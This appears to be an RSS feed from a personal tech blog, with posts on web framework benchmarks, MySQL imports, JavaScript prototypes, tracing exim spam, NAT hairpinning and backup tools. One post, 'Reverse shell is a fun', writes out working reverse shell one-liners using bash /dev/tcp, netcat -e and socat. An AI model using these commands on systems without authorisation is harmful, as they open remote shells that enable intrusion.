<p>How about Iron?  </p>

<pre><code>extern crate iron;

use iron::prelude::*;  
use iron::status;

fn main() {  
    Iron::new(|_: &amp;mut Request| {
        Ok(Response::with((status::Ok, "Hello world!")))
    }).http("0.0.0.0:3000").unwrap();
}
</code></pre>

<p>Wrk again:  </p>

<pre><code>$ wrk -t12 -c900 -d10s http://127.0.0.1:3000/
Running 10s test @ http://127.0.0.1:3000/  
  12 threads and 900 connections
  Thread Stats   Avg      Stdev     Max   +/- Stdev
    Latency     1.03ms    0.95ms  20.98ms   96.66%
    Req/Sec     2.59k   563.94     4.06k    58.67%
  77369 requests in 10.05s, 8.41MB read
Requests/sec:   7698.92  
Transfer/sec:    857.11KB  
</code></pre>

<p>Rust is a compiled language and multithreaded by default, so I think the Node.js results are impressive :)</p>]]></description><link>http://blog.roundside.com/why-you-should-clustering-youre-node-js-apps/</link><guid isPermaLink="false">9abe6d57-4d66-4401-918d-4be776c9d609</guid><category><![CDATA[load-balancing]]></category><category><![CDATA[node.js]]></category><category><![CDATA[clustering]]></category><dc:creator><![CDATA[Vadim]]></dc:creator><pubDate>Sun, 05 Jul 2015 06:38:38 GMT</pubDate></item><item><title><![CDATA[Import to MySql from dump files]]></title><description><![CDATA[<p>Sometimes we need to insert data into a database, and sometimes that data comes in a strange format (different separators, termination characters, etc.). In such cases, tools like phpMyAdmin aren't very useful.   </p>

<p>Happily, the MySQL CLI has everything we need (and much more).   </p>

<p>Let's look at this simple dump file as an example:  </p>

<pre><code class="syntax-csv">|-name-|-age-|-result-|-city-|
|Alice|23|true|Sacramento
|Bob|31|false|Austin
|Eve|25|true|Dallas
|John|23|false|undefined
|Steve|34|true|DC
</code></pre>

<p>At the top we have a header line describing the column names; below it, the data separated by "|". Note that every line also begins with "|" and ends with a newline character. <br />
Check this:  </p>

<pre><code class="syntax-bash">user@mysql:/tmp$ cat user_import.txt | od -c  
0000000   |   -   n   a   m   e   -   |   -   a   g   e   -   |   -   r  
0000020   e   s   u   l   t   -   |   -   c   i   t   y   -   |  \n   |  
0000040   A   l   i   c   e   |   2   3   |   t   r   u   e   |   S   a  
0000060   c   r   a   m   e   n   t   o  \n   |   B   o   b   |   3   1  
0000100   |   f   a   l   s   e   |   A   u   s   t   i   n  \n   |   E  
0000120   v   e   |   2   5   |   t   r   u   e   |   D   a   l   l   a  
0000140   s  \n   |   J   o   h   n   |   2   3   |   f   a   l   s   e  
0000160   |   u   n   d   e   f   i   n   e   d  \n   |   S   t   e   v  
0000200   e   |   3   4   |   t   r   u   e   |   D   C  \n  
0000215
</code></pre>

<p>This file has Unix-style LF newlines ("\n"); we'll need this to specify the line terminator. <br />
Let's import it. <br />
Create a new table:</p>

<pre><code class="syntax-sql">mysql&gt; create table temp_users (name text, age int, result text, city text, id int auto_increment primary key) character set utf8 collate utf8_bin;  
</code></pre>

<p>and use <a href='https://dev.mysql.com/doc/refman/5.1/en/load-data.html' >load data</a> infile to insert the dump into the table (of course, the dump file must be accessible from the MySQL server):  </p>

<pre><code class="syntax-mysql">mysql&gt; load data infile "/tmp/user_import.txt" into table temp_users  
    -&gt; fields terminated by "|"  
    -&gt; lines starting by "|"  
    -&gt; terminated by "\n"  
    -&gt; ignore 1 lines; 
</code></pre>

<p><em>ignore 1 lines</em> just skips the first line with the column names.
Check it:  </p>

<pre><code>mysql&gt; select * from temp_users;  
+-------+------+--------+------------+----+
| name  | age  | result | city       | id |
+-------+------+--------+------------+----+
| Alice |   23 | true   | Sacramento | 29 |
| Bob   |   31 | false  | Austin     | 30 |
| Eve   |   25 | true   | Dallas     | 31 |
| John  |   23 | false  | undefined  | 32 |
| Steve |   34 | true   | DC         | 33 |
+-------+------+--------+------------+----+
5 rows in set (0.00 sec)  
</code></pre>

<p>Pretty simple, but very powerful. <br />
Of course, we can create a dump file with <a href='https://dev.mysql.com/doc/refman/5.0/en/select-into.html' >outfile</a> too :)  </p>

<pre><code class="syntax-sql">mysql&gt; select * from temp_users into outfile "/tmp/temp_users.csv"  
    -&gt; fields terminated by "," 
    -&gt; enclosed by '"' 
    -&gt; lines terminated by "\n";
</code></pre>

<p>And get valid CSV:  </p>

<pre><code>user@mysql:/tmp$ cat temp_users.csv  
"Alice","23","true","Sacramento","29"  
"Bob","31","false","Austin","30"  
"Eve","25","true","Dallas","31"  
"John","23","false","undefined","32"  
"Steve","34","true","DC","33"
</code></pre>]]></description><link>http://blog.roundside.com/import-to-mysql-from-various-files/</link><guid isPermaLink="false">9ed0ef1a-ca1d-4b41-b44e-ca6555be0fe4</guid><category><![CDATA[linux]]></category><category><![CDATA[sql]]></category><category><![CDATA[mysql]]></category><dc:creator><![CDATA[Vadim]]></dc:creator><pubDate>Sun, 19 Apr 2015 06:59:32 GMT</pubDate></item><item><title><![CDATA[Reverse shell is a fun]]></title><description><![CDATA[<p><strong>Need SSH access, but something is going wrong? Read on!</strong></p>

<p>Sometimes I need a shell right now, but in some cases it's impossible (no ssh on the hosting or something like that). <br />
Happily, bash has built-in network pseudo-interfaces /dev/tcp and /dev/udp (available by default on most distros). So we can use bash (or php, ruby, etc.) on the server to create a reverse connection to a listener and get shell access.</p>

<p><strong>/dev/tcp</strong></p>

<p>To use it, we need to redirect output from /dev/tcp to a file or something else. <br />
A simple example:  </p>

<pre><code class="syntax-bash">user@host ~ $ cat &lt; /dev/tcp/time.nist.gov/13

57103 15-03-22 23:54:14 50 0 0 587.5 UTC(NIST) * 
</code></pre>

<p>Send an HTTP request:  </p>

<pre><code class="syntax-bash">user@host ~ $ exec 3&lt;&gt; /dev/tcp/roundside.com/80  
user@host ~ $ echo -e "GET / HTTP/1.1\nHost: roundside.com\nConnection: close\n\n" &gt;&amp;3  
user@host ~ $ cat &lt;&amp;3  
HTTP/1.1 200 OK  
Server: nginx/1.6.1  
Date: Mon, 23 Mar 2015 00:06:00 GMT  
Content-Type: text/html  
Content-Length: 11517  
Connection: close  
Last-Modified: Tue, 09 Dec 2014 17:40:10 GMT  
ETag: "6587d2-2cfd-509cc08e7aef5"  
Accept-Ranges: bytes  
Vary: Accept-Encoding

&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""  
...
</code></pre>

<p>This is a little different from the previous example. Since we need to send data first, we create file descriptor 3 for reading and writing and bind it to /dev/tcp/address/port:</p>

<pre><code>exec 3&lt;&gt; /dev/tcp/roundside.com/80  
</code></pre>

<p>A beautiful article about redirections is <a href='http://www.catonmat.net/blog/bash-one-liners-explained-part-three/' >here</a>. <br />
Next, create the HTTP request header and write it to file descriptor 3 to send it:  </p>

<pre><code>echo -e "GET / HTTP/1.1\nHost: roundside.com\nConnection: close\n\n" &gt;&amp;3  
</code></pre>

<p>And finally, read the response.  </p>

<pre><code>cat &lt;&amp;3  
</code></pre>

<p><strong>Now, let's get a bash shell over TCP</strong> <br />
/dev/tcp can only connect to other addresses, so netcat or socat is needed on the listener side.
Create a listener:  </p>

<pre><code class="syntax-bash">user@listener ~: nc -l -p 1413
</code></pre>

<p>And connect to it from target:  </p>

<pre><code class="syntax-bash">user@target ~ $ /bin/bash -c "/bin/bash -i &gt; /dev/tcp/listener_address/1413 0&gt;&amp;1 2&gt;&amp;1"  
</code></pre>

<p>Done, now we have a remote shell using bash only:  </p>

<pre><code class="syntax-bash">user@listener ~: nc -l -p 1413  
user@target ~ $ 
</code></pre>

<p>In this example bash runs in interactive mode  </p>

<pre><code class="syntax-bash">/bin/bash -i
</code></pre>

<p>(bash will source ~/.bashrc or the default bash config file, so we get a slightly nicer shell) and sends all its stdout to the listener,</p>

<pre><code class="syntax-bash">/bin/bash -i &gt; /dev/tcp/listener_address/1413
</code></pre>

<p>and everything sent from the listener will be executed in bash and redirected back to the listener (stderr is also redirected; this is important)  </p>

<pre><code class="syntax-bash">/bin/bash -i &gt; /dev/tcp/listener_address/1413 0&gt;&amp;1 2&gt;&amp;1
</code></pre>

<p>More elegant:  </p>

<pre><code class="syntax-bash">/bin/bash -c "bash -i &amp;&gt; /dev/tcp/listener_address/1413 0&gt;&amp;1"
</code></pre>

<p><strong>&amp;></strong> or <strong>>&amp;</strong> redirects both stderr and stdout to the specified address.</p>

<p>Of course, <strong>netcat with the '-e' parameter</strong> can be used to execute bash:  </p>

<pre><code>user@target ~ $ nc listener_address 1413 -e '/bin/bash'  
</code></pre>

<p>But there is a problem. <br />
Key shortcuts and ncurses-based programs will not work correctly. We need proper tty access now, <strong>and it's <a href='http://www.dest-unreach.org/socat/' >Socat</a> time!</strong>   </p>

<p>Socat is like netcat, but with extremely powerful features (it may be downloaded from <a href='http://files.roundside.com/linux/' >here</a> for Linux or <a href='http://files.roundside.com/freebsd/' >here</a> for FreeBSD, both statically linked). <br />
Create a listener:  </p>

<pre><code class="syntax-bash">user@listener ~: socat -,raw,echo=0 tcp-listen:1413  
</code></pre>

<p>And connect from target:  </p>

<pre><code class="syntax-bash">user@target ~ $ socat tcp:listener_address:1413 exec:"bash -i",pty,stderr,setsid,sigint,sane  
</code></pre>

<p>Now we can play ninvaders, use htop, mc, vim and any other cli stuff :)</p>

<p>PS: don't forget to adjust the terminal size after getting the reverse shell. <br />
See the actual size:  </p>

<pre><code>echo $LINES,$COLUMNS  
53,159
</code></pre>

<p>and export it after getting the shell:  </p>

<pre><code>export LINES=53;export COLUMNS=159  
</code></pre>

<p>All for now.</p>

<p>Want more? <br />
<a href='http://www.dest-unreach.org/socat/doc/socat.html' >Socat man and examples page</a></p>

<p>Refs: <br />
<a href='https://stuff.mit.edu/afs/sipb/machine/penguin-lust/src/socat-1.7.1.2/EXAMPLES' >https://stuff.mit.edu/afs/sipb/machine/penguin-lust/src/socat-1.7.1.2/EXAMPLES</a> <br />
<a href='http://www.catonmat.net/blog/bash-one-liners-explained-part-three/' >http://www.catonmat.net/blog/bash-one-liners-explained-part-three/</a> <br />
<a href='http://www.gnucitizen.org/blog/reverse-shell-with-bash/' >http://www.gnucitizen.org/blog/reverse-shell-with-bash/</a> <br />
<a href='http://blog.rootshell.ir/2010/08/get-your-interactive-reverse-shell-on-a-webhost/' >http://blog.rootshell.ir/2010/08/get-your-interactive-reverse-shell-on-a-webhost/</a></p>]]></description><link>http://blog.roundside.com/reverse-shell-is-a-fun/</link><guid isPermaLink="false">dc296835-1c7f-4e51-9de7-e8a89441dfb0</guid><category><![CDATA[fun]]></category><category><![CDATA[linux]]></category><category><![CDATA[bash]]></category><dc:creator><![CDATA[Vadim]]></dc:creator><pubDate>Mon, 23 Mar 2015 02:03:07 GMT</pubDate></item><item><title><![CDATA[Inheritance and prototype chains in JavaScript]]></title><description><![CDATA[<p>There are a lot of posts on the web about inheritance and prototypes in JS. In my opinion, one of the best comes from <a href='https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Inheritance_and_the_prototype_chain' >MDN</a>. <br />
Wait! <a href='http://dmitrysoshnikov.com/ecmascript/' >This guy</a> really knows the core of JavaScript; read his incredible articles if you want more.</p>

<p>In this post I'll try to show the relations between all elements in JavaScript and the <strong>Object.prototype</strong> object, which is fundamental and the parent of all other elements.</p>

<p>There are two global data types in JavaScript: <strong>primitives</strong> and <strong>objects</strong>. So, not everything in JS is an object. But primitives can in some cases be converted to objects.</p>
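<p>A quick way to see this split is <code>typeof</code> (a small sketch; note the well-known quirk that <code>typeof null</code> returns "object", even though null is a primitive):</p>

```javascript
// primitives
console.log(typeof "hello")    // "string"
console.log(typeof 42)         // "number"
console.log(typeof true)       // "boolean"
console.log(typeof undefined)  // "undefined"
console.log(typeof null)       // "object" - a historical quirk, null is still a primitive

// objects
console.log(typeof {})              // "object"
console.log(typeof [])              // "object"
console.log(typeof function () {})  // "function" - functions are objects too
```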

<p>The list of built-in <strong>objects</strong> is <a href='https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects' >here</a></p>

<p><strong>Primitives:</strong></p>

<ul>
<li>String  </li>
<li>Number  </li>
<li>Boolean  </li>
<li>Null  </li>
<li>undefined  </li>
</ul>

<p>But these types of data (except <strong>null</strong> and <strong>undefined</strong>) are created by object constructors (or wrappers). For example, when we define something like this:  </p>

<pre><code class="syntax-javascript">var word = "Hello!"  
</code></pre>

<p>the <strong>String()</strong> constructor is executed and a new variable with type "string" is created. <br />
And as we know, <strong>primitives are immutable</strong>, so we can't add properties to a string or a boolean. <br />
But how, then, can we get the string length (which is a property of the foo variable)?  </p>

<pre><code class="syntax-javascript">var foo="123"  
console.log(foo.length) //3  
</code></pre>

<p><strong>All this works because of the prototype chain.</strong> <br />
The prototype chain is a <a href='https://en.wikipedia.org/wiki/Prototype-based_programming' >language feature</a> that provides delegation based on prototypes: an object has its own properties as well as shared properties that are inherited.</p>

<p>Every object in JavaScript has a <strong>prototype property</strong>. <br />
This property may be a link to another object or null. The only object whose prototype property is null (in the normal case) is <strong>Object.prototype</strong> (more about it below)</p>
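<p>We can verify this directly. A short sketch using Object.getPrototypeOf, the standard way to read an object's prototype link:</p>

```javascript
var obj = {}
// the prototype of a plain object is Object.prototype
console.log(Object.getPrototypeOf(obj) === Object.prototype)  // true
// and the chain ends there: Object.prototype itself has no prototype
console.log(Object.getPrototypeOf(Object.prototype) === null) // true
```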

<p>For a better understanding of what prototypes are and how chains are created, let's look at another simple example:</p>

<pre><code class="syntax-javascript">var bar = {}  
// for simplicity, we can say this is equivalent to
var bar = new Object()
</code></pre>

<p>In detail, this simple operation means:  </p>

<ul>
<li>create the <strong>Object.prototype</strong> object using the Object() constructor</li>
<li>create a new object <strong>bar</strong> using the Object() constructor and set its prototype property to Object.prototype (bar.__proto__ === Object.prototype //true) <br />
<img src='http://files.roundside.com/content/object_pt_obj.png' ></li>
</ul>

<p>This means that the bar object inherits all methods and properties from the Object.prototype object. That's why we can get a result from bar.toString().</p>

<p>To access an object's prototype we can use the <strong>__proto__</strong> property, which shows the actual prototype of the object.</p>

<p>A <a href="#constructor">constructor</a> is a function that creates an object (more about it below); an excellent article about constructors and more is <a href='http://dmitrysoshnikov.com/ecmascript/javascript-the-core/' >here</a></p>

<p>So, what is a prototype chain? <br />
In a nutshell, this is how properties are looked up. When we access some property, for example bar.toString, and it is not found on the object itself, it is next looked up in object.[[prototype]], then in object.[[prototype]].[[prototype]] and so on, until the property is found or <strong>__proto__ returns null</strong>. The latter means the <strong>prototype chain has ended</strong>, and in this case the lookup returns <strong>undefined</strong>. <br />
Let's create a string:  </p>
Let's create a string:  </p>

<pre><code class="syntax-javascript">var a = "foo"  
console.log(a.__proto__ === String.prototype) //true  
console.log(String.prototype.__proto__ === Object.prototype) //true  
</code></pre>

<p>And create a new method on Object.prototype, so that all objects can access it:  </p>

<pre><code class="syntax-javascript">Object.prototype.ping = function () {  
    return "pong"
}
console.log( a.ping() )                                   //"pong", inherited from Object.prototype  
console.log(a.hasOwnProperty("ping"))                     //false, a doesn't have ping property  
console.log(a.__proto__.hasOwnProperty("ping"))           //false, String.prototype doesn't have ping property  
console.log(a.__proto__.__proto__.hasOwnProperty("ping")) //true, ping property found in Object.prototype  
console.log(a.hasOwnProperty("toString"))                 //false, a doesn't have a toString property  
console.log(a.__proto__.hasOwnProperty("toString"))       //true, toString property found in String.prototype  
console.log(a.toString === String.prototype.toString)     //true  
</code></pre>

<p><strong>Note:</strong> Object.prototype also has a toString property, but these are two different methods. <br />
But if primitives can't have properties at all, how can we do this? <br />
This feature is called <strong>autoboxing</strong> (or just boxing in some cases). To access a property of a primitive, a temporary wrapper object is created; after the property is accessed, this object is deleted:  </p>

<pre><code class="syntax-javascript">var wrapper = new String("foo")  
console.log( wrapper.ping() )  
delete wrapper  
</code></pre>

<p><img src='http://files.roundside.com/content/string_proto.svg' /></p>

<p>The <strong>"native constructors"</strong> block contains the constructors that create the corresponding objects in this example. All functions (native and our own) are created by the <strong>Function</strong> constructor and inherit their properties from <strong>Function.prototype</strong>.  </p>

<pre><code class="syntax-javascript">var Foo = function () {}  
//all functions inherit their properties from Function.prototype
console.log(Foo.__proto__      === Function.prototype) //true  
console.log(Function.__proto__ === Function.prototype) //true  
console.log(String.__proto__   === Function.prototype) //true  
console.log(Number.__proto__   === Function.prototype) //true  
console.log(Array.__proto__    === Function.prototype) //true  
console.log(Object.__proto__   === Function.prototype) //true  
//constructors:
console.log(Foo.prototype.constructor      === Foo)     //true  
console.log(Function.prototype.constructor === Function)//true  
console.log(String.prototype.constructor   === String)  //true  
console.log(Number.prototype.constructor   === Number)  //true  
console.log(Array.prototype.constructor    === Array)   //true  
console.log(Object.prototype.constructor   === Object)  //true  
</code></pre>

<p style="font-weight:bold" id="constructor">Constructor</p>  

<p>A constructor creates an object and sets all its properties. To better understand how this works, take a look at the algorithm of function creation from <a href='http://dmitrysoshnikov.com/ecmascript/chapter-5-functions/' >Dmitry Soshnikov</a>  </p>

<pre><code class="syntax-javascript">F = new NativeObject();

/* property [[Class]] is "Function" */
F.[[Class]] = "Function"

/* a prototype of a function object */
F.[[Prototype]] = Function.prototype

/* reference to function itself */
/* [[Call]] is activated by call expression F() */
/* and creates a new execution context */
F.[[Call]] = &lt;reference to function&gt;

/*  built in general constructor of objects */
/*  [[Construct]] is activated via "new" keyword */
/*  and it is the one who allocates memory for new */
/*  objects; then it calls F.[[Call]] */
/*  to initialize created objects passing as */
/*  "this" value newly created object */
F.[[Construct]] = internalConstructor

/*  scope chain of the current context  */
/*  i.e. context which creates function F */
F.[[Scope]] = activeContext.Scope  
/* if this function is created  */
/* via new Function(...), then */
F.[[Scope]] = globalContext.Scope

/* number of formal parameters */
F.length = countParameters

/* a prototype of created by F objects */
__objectPrototype = new Object();  
__objectPrototype.constructor = F // {DontEnum}, is not enumerable in loops  
F.prototype = __objectPrototype

return F  
</code></pre>

<p>How about our own constructors?  </p>

<pre><code class="syntax-javascript">Object.prototype.ping = function () {  
    return "pong"
}
//simple object constructor
var Foo = function () {  
    this.x = 5
    this.y = "yes"
    this.z = false
    this.check = function () {
        return this.y + ", checked"
        }
}
//create object using it
var a = new Foo()  
console.log(a.check())   //"yes, checked", own  
//another object, set prototype to a object. Now b can access all properties from a
var b = {  
    x: 13,
    z: 19,
    __proto__: a
}
console.log(b.x)                                     //13, own  
console.log(b.z)                                     //19, own  
console.log(b.y)                                     //"yes", delegated from a  
console.log(b.check())                               //"yes, checked", delegated from a  
console.log(b.ping())                                //"pong", delegated from Object.prototype  
console.log(b.ping === Object.prototype.ping)        //true  
console.log(b.toString())                            //"[object Object]", delegated from Object.prototype  
console.log(b.toString === Object.prototype.toString)//true  
delete b.x                                           //own property x deleted  
console.log(b.x)                                     //5, delegated from a  
delete a.x                                           //x property from a deleted  
console.log(b.x)                                     //undefined, x property not found in prototype chain  
</code></pre>

<p><img src='http://files.roundside.com/content/own_constructors.png' /></p>

<p>Of course, modifying native objects is a bad idea. This is called monkey-patching and may cause problems. <br />
But when done carefully, it may be very useful.</p>

<p>Also, a good idea is to protect our own properties from being modified or listed in for-in loops:</p>

<pre><code class="syntax-javascript">Object.defineProperty(String.prototype, "foo", {  
    value: function () {
        return "something"
        },
    writable: true,
    enumerable: true,
    configurable: true
 })
var x = "some text"  
for (key in x) {  
        console.log(x[key])  //some text, [Function]
}
//hide the property from being listed in loops and from being modified/deleted
Object.defineProperty(String.prototype, "foo", {  
    writable: false,
    enumerable: false,
    configurable: false
})
console.log(x.foo())         //"something"  
delete String.prototype.foo  
console.log(x.foo())         //"something"  
String.prototype.foo = null  
console.log(x.foo())         //"something"  
for (key in x) {  
        console.log(x[key])  //some text
}

//check it:
console.log(Object.getOwnPropertyDescriptor(String.prototype, "foo"))  
/*
{ value: [Function],
  writable: false,
  enumerable: false,
  configurable: false }
*/
</code></pre>

<p>That's all for now :)  </p>

<p>Refs: <br />
<a href='https://developer.mozilla.org/en-US/docs/Web/JavaScript' >MDN</a> <br />
<a href='http://dmitrysoshnikov.com/ecmascript/' >ECMA-262 by Dmitry Soshnikov</a> <br />
<a href='https://javascriptweblog.wordpress.com/2010/06/07/understanding-javascript-prototypes/' >Angus Croll</a>  </p>]]></description><link>http://blog.roundside.com/inheritance-and-prototype-chains-in-javascript/</link><guid isPermaLink="false">6e97bc88-ca15-4a7f-8ff1-9727d7444d04</guid><category><![CDATA[javascript]]></category><category><![CDATA[prototypes]]></category><dc:creator><![CDATA[Vadim]]></dc:creator><pubDate>Mon, 09 Mar 2015 19:24:00 GMT</pubDate></item><item><title><![CDATA[Search for php spam script location. Exim & php]]></title><description><![CDATA[<p>If your server suddenly starts sending a lot of mail, you need to determine the source. This may not be so easy when the server has a lot of virtual hosts. <br />
So, how can we find where the spam code is located? <br />
Generally, it's not that hard. We need to look at the mail headers and their contents. <br />
Often spam messages are "frozen" by the local MTA due to rejection by the recipient MTA (frozen messages are also called bounce messages). <br />
To list frozen messages in exim:  </p>

<pre><code>[root@mta:~]# exim -bp | grep frozen
 7h  4.7K 1YIKRV-0004za-C8 &lt;&gt; *** frozen ***
 7h  4.7K 1YIKCZ-00051D-Rs &lt;&gt; *** frozen ***
 7h  7.5K 1YIKaD-0002g3-Jp &lt;&gt; *** frozen ***
 6h  6.8K 1YILJi-0006U4-LC &lt;&gt; *** frozen ***
 6h  6.6K 1YILgM-00010l-W7 &lt;&gt; *** frozen ***
 6h  6.8K 1YILo8-0002aq-O9 &lt;&gt; *** frozen ***
 6h  8.4K 1YILo5-0002d9-GO &lt;&gt; *** frozen ***
 6h  8.0K 1YILrY-00035g-Ga &lt;&gt; *** frozen ***
 5h  9.6K 1YIM2j-0004pV-PD &lt;&gt; *** frozen ***
</code></pre>

<p>Let's find the script that generates the unwanted mail. To do this, look at the mail headers:</p>

<p><strong>Note</strong>: some frozen messages contain a copy of the failed message, so for the X-PHP-Originating-Script header you may need the <strong>body</strong> of the message, not its headers. In any case, the body of the spam message should be examined.</p>

<pre><code>[root@sv-114:~]# exim -Mvh 1YIM2j-0004pV-PD
1YIM2j-0004pV-PD  
joe 1060 1060  
&lt;joe@examle&gt;  
1422921664 0  
-ident joe
-received_protocol local
-body_linecount 5
-max_received_linelength 131
-auth_id joe
-auth_sender joe@example
-allow_unqualified_recipient
-allow_unqualified_sender
-local
XX  
1  
bob@example.org

175P Received: from joe by mta.example.org with local (Exim 4.80)  
    (envelope-from &lt;joe@example&gt;)
    id 1YIM2j-0004pV-PD
    for bob@examle.org; Tue, 03 Feb 2015 02:01:04 +0200
025T To: bob@examle.org  
026  Subject: Contacts request  
042  X-PHP-Originating-Script: 1060:mailer.php  
028F From: robot@examle.org  
032R Reply-To: robot@examle.org  
018  MIME-Version: 1.0  
038  Content-Type: text/html;charset=utf-8  
054I Message-Id: &lt;1YIM2j-0004pV-PD@mta.example.org&gt;  
038  Date: Tue, 03 Feb 2015 02:01:04 +0200  
</code></pre>

<p>Good. Now we know the id, uid and gid of the user the script ran as, and the script name itself: <strong>mailer.php</strong>.    </p>

<p>Also, the mail contents may be interesting:  </p>

<pre><code>[root@mta:~]# exim -Mvb 1YIM2j-0004pV-PD
&lt;html&gt;&lt;body style='font-family:Arial,sans-serif;'&gt;&lt;h2 style='font-weight:bold;border-bottom:1px dotted #ccc;'&gt;Contacts request&lt;/h2&gt;  
&lt;p&gt;&lt;strong&gt;Want some spam? Contact us at woohoo@exampe.org&lt;/strong&gt;&lt;/p&gt;  
&lt;/body&gt;&lt;/html&gt;  
</code></pre>

<p>Adding the <strong>X-PHP-Originating-Script</strong> header to mail headers must be enabled in php.ini (the mail.add_x_header option).  </p>

<p>After the malicious script has been removed (or renamed for further research), the frozen messages may be deleted:  </p>

<pre><code>[root@mta ~]# exim -bpu | grep frozen | awk {'print  $3'} | xargs exim -Mrm
</code></pre>

<p>Thanks to: <a href='http://blog.wapnet.nl/2013/11/show-spam-script-on-linux-webserver/' >http://blog.wapnet.nl/2013/11/show-spam-script-on-linux-webserver/</a></p>]]></description><link>http://blog.roundside.com/search-for-php-spam-script-location-exim-php/</link><guid isPermaLink="false">36bc2d00-9408-436e-858d-11d85ed25b5c</guid><category><![CDATA[mail]]></category><category><![CDATA[exim]]></category><category><![CDATA[spam]]></category><dc:creator><![CDATA[Vadim]]></dc:creator><pubDate>Mon, 02 Feb 2015 18:43:04 GMT</pubDate></item><item><title><![CDATA[A few words about NAT hairpinning]]></title><description><![CDATA[<p><a href='http://en.wikipedia.org/wiki/Hairpinning' >NAT hairpinning</a> is very useful if you have some service (ssh, http, etc.) behind a router but don't want to specify the local address when you are inside the local network.
So, usually SNAT (or masquerading in some cases) works like this:</p>

<p>Good article about hairpinning (and images located below too) from MikroTik wiki is <a href='http://wiki.mikrotik.com/wiki/Hairpin_NAT' >here</a></p>

<p><img src='http://files.roundside.com/content/hairpinning_scheme.png' ></p>

<p>In a nutshell, all requests come through the router, so it can manipulate the client's (2.2.2.2) and the server's (192.168.1.2) dst and src addresses, and in this case the connection is established. <br />
<img src='http://files.roundside.com/content/harpin1.png' ></p>

<p>But when you try to connect to 1.1.1.1 from 192.168.1.10: <br />
<img src='http://files.roundside.com/content/hairpin2.png' > <br />
The response from the server goes <strong>directly from 192.168.1.2 to 192.168.1.10 and the connection is dropped</strong>, because the initial connection was made to 1.1.1.1, not to 192.168.1.2.</p>

<p>And to fix this funny issue, we need just one <strong>srcnat</strong> (or masquerade, which may be easier to set up) rule:</p>

<p>All <strong>requests from the local network to the web server that come through the router must be NAT-ed</strong></p>

<p>(of course, in normal situations requests between two local hosts go directly to each other at layer 2 of the OSI model)   </p>

<p><img src='http://files.roundside.com/content/hairping3.png' ></p>

<p>In this case, the <strong>router will send the request to the web server from its local-network interface</strong>, and after it receives the response it will replace the web server's src address (192.168.1.2) with 1.1.1.1 and the dst address 192.168.1.1 with 192.168.1.10</p>

<p>From MikroTik Wiki:  </p>

<pre><code>/ip firewall nat 
add chain=srcnat src-address=192.168.1.0/24 \  
dst-address=192.168.1.2 protocol=tcp dst-port=80 \  
out-interface=LAN action=masquerade  
</code></pre>

<p>or if you prefer WebFig: <br />
<img src='http://files.roundside.com/content/wfig_hairping1.png' > <br />
and as the action, set masquerade or srcnat to the router's local IP: <br />
<img src='http://files.roundside.com/content/wfig_hairping2.png' ></p>

<p>That's all for now :)</p>]]></description><link>http://blog.roundside.com/a-few-words-about-nat-hairpinning/</link><guid isPermaLink="false">0092cc27-05f4-4d43-90d6-461edacaaa60</guid><category><![CDATA[networking]]></category><dc:creator><![CDATA[Vadim]]></dc:creator><pubDate>Thu, 15 Jan 2015 06:31:09 GMT</pubDate></item><item><title><![CDATA[Duplicity vs rdiff-backup in action]]></title><description><![CDATA[<p><link rel="stylesheet" href='http://files.roundside.com/content/chartist.min.css' >
   <script src='http://files.roundside.com/content/chartist.min.js' ></script></p>

<p><a href='http://www.nongnu.org/rdiff-backup/index.html' >Rdiff-backup</a> is one of my favorite tools for backing up local stuff. Why? It's pretty simple and stores the full backup 'as is', so the backup files (the current mirror) can be easily accessed.</p>

<p>The main disadvantage I saw is speed: rdiff-backup may be <strong>very slow</strong> on some files.  </p>

<h4 id="duplicityisthesolution">Duplicity is the solution?</h4>

<p><a href='http://duplicity.nongnu.org/' >Duplicity</a>, as I see it, is the next generation of rdiff-backup. It has some useful extras, such as encryption, many destination protocols... and much more!</p>

<h4 id="letsmakeafewtestsnow">Let's make a few tests now.</h4>

<p>I'll use <strong>Docker</strong> to create several isolated containers. Some of them will be storage nodes and the others will be hosts with important data which we need to back up.   </p>

<blockquote>
  <p>Feeling lazy? Jump to the <a href="#resultsandconclusion">results</a> and see who is <a href="#resultsandconclusion">fastest</a> and <a href="#comparisonofusedspacestrongstylecolord7a502rdiffbackupstrongandstrongstylecolorf05b4fduplicitystrongm">most efficient</a> </p>
</blockquote>

<p><strong>Containers in this example:</strong> <br />
<code>
data01    -- local node with data for rdiff-backup <br />
data02    -- remote node with ssh server and rdiff-backup <br />
storage01 -- local node with data for duplicity <br />
storage02 -- remote node with ssh server (for duplicity) <br />
</code></p>

<p><strong>Full local backup::#duplicity</strong> <br />
Local test:  </p>

<pre><code class="language-bash">docker run -ti --hostname data01 debian:latest  
</code></pre>

<pre><code class="language-shell">root@data01:/# apt-get update &amp;&amp; apt-get -y upgrade &amp;&amp; apt-get -y install duplicity  
</code></pre>

<pre><code class="language-bash">root@data01:/# cd $(mktemp -d)  
</code></pre>

<p>Now, I'll copy one of my old projects from a production server using the bash pseudo-interface /dev/tcp (netcat/socat or ssh would be better in real life):  </p>

<pre><code class="language-bash">root@data01:/tmp/tmp.YMFLVKqr67# tar xvzf - &lt; /dev/tcp/test.roundside.com/5739  
</code></pre>

<pre><code class="language-bash">root@data01:/tmp/tmp.YMFLVKqr67# du -hs;find . -type f | wc -l;find . -type d | wc -l  
512M    .  
33599  
19637  
</code></pre>

<p>So, this directory has <strong>33599 files</strong> and <strong>19637 directories</strong>, and takes up <strong>512MB</strong> of space.</p>

<pre><code class="language-bash">root@data01:/# time duplicity --no-encryption /tmp/tmp.YMFLVKqr67/ file:///var/duplicity/

Import of duplicity.backends.giobackend Failed: No module named gio  
Local and Remote metadata are synchronized, no sync needed.  
Last full backup date: none  
No signatures found, switching to full backup.  
--------------[ Backup Statistics ]--------------  
StartTime 1417922856.64 (Sun Dec  7 03:27:36 2014)  
EndTime 1417922891.19 (Sun Dec  7 03:28:11 2014)  
ElapsedTime 34.55 (34.55 seconds)  
SourceFiles 53236  
SourceFileSize 443922301 (423 MB)  
NewFiles 53236  
NewFileSize 443922301 (423 MB)  
DeletedFiles 0  
ChangedFiles 0  
ChangedFileSize 0 (0 bytes)  
ChangedDeltaSize 0 (0 bytes)  
DeltaEntries 53236  
RawDeltaSize 362387325 (346 MB)  
TotalDestinationSizeChange 218640180 (209 MB)  
Errors 0


-------------------------------------------------

real    0m36.289s  
user    0m30.549s  
sys     0m4.578s
</code></pre>

<p>First local backup time: 36 seconds.</p>

